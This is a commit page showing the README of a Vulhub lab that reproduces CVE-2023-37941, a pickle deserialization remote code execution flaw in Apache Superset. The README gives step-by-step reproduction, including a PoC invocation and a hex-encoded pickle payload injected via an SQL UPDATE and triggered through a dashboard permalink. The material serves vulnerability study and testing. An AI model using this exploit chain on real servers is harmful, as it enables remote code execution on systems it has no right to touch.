aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

70
superset/CVE-2023-37941/README.md Normal file
View File

@@ -0,0 +1,70 @@
# Apache Superset Python Pickle Deserialization Leads to RCE (CVE-2023-37941)
[中文版本(Chinese version)](README.zh-cn.md)
Apache Superset is an open-source data exploration and visualization platform designed to be visual, intuitive, and interactive.
Apache Superset versions from 1.5 to 2.1.0 contain a Python Pickle deserialization vulnerability (CVE-2023-37941). The application uses Python's `pickle` package to store certain configuration data in the metadata database. An authenticated user with write access to the metadata database can insert a malicious pickle payload, which when deserialized by the application, leads to remote code execution on the Superset server.
When combined with [CVE-2023-27524](../CVE-2023-27524), an unauthenticated attacker can achieve remote code execution by first bypassing authentication and then exploiting the deserialization vulnerability.
References:
- <https://www.horizon3.ai/attack-research/disclosures/apache-superset-part-ii-rce-credential-harvesting-and-more/>
- <https://github.com/Barroqueiro/CVE-2023-37941>
- <https://forum.butian.net/share/2458>
## Environment Setup
Execute the following command to start an Apache Superset 2.0.1 server:
```
docker compose up -d
```
After the server is started, you can access Superset at `http://your-ip:8088`. The default login credentials are admin/vulhub.
## Vulnerability Reproduction
The following steps assume you have already generate a valid session cookie and logged into the Dashboard through the [CVE-2023-27524](../CVE-2023-27524) vulnerability.
First, create a new "Dashboard" and generate a permalink by clicking the "Share" button, copy this permalink and we will use it later:
![](1.png)
Then, create a new "Database" connection by following the steps below:
1. Navigate to "Data" → "Databases" in the Superset UI
2. Click "+ Database" to add a new database connection
3. Enter a name for the database (e.g., "SQLite")
4. For the SQLAlchemy URI, use: `sqlite+pysqlite:////app/superset_home/superset.db`
5. Expand "Advanced" and check "Expose in SQL Lab" and "Allow DML"
6. Save the database configuration
![](2.png)
![](3.png)
Then, use [CVE-2023-37941.py](CVE-2023-37941.py) to generate a malicious SQL command (the `-d` option can be `sqlite`, `mysql`, or `postgres`, means the database type of the Superset server, here is `sqlite` in Vulhub):
```shell
$ python3 CVE-2023-37941.py -c "touch /tmp/success" -d sqlite
[+] Base64 encoded payload:
Y3Bvc2l4CnN5c3RlbQpwMAooVnRvdWNoIC90bXAvc3VjY2VzcwpwMQp0cDIKUnAzCi4=
[+] Hex encoded payload (for SQL):
update key_value set value=X'63706f7369780a73797374656d0a70300a2856746f756368202f746d702f737563636573730a70310a7470320a5270330a2e' where resource='dashboard_permalink';
```
> [!NOTE]
> Because the `pickle` deserialization payload is different for different operating systems, you need to run the POC on Linux or MacOS.
Execute the generated SQL command in the SQL Lab:
![](4.png)
Finally, trigger the deserialization by accessing the permalink:
![](5.png)
As you can see, the `touch /tmp/success` command has been executed successfully.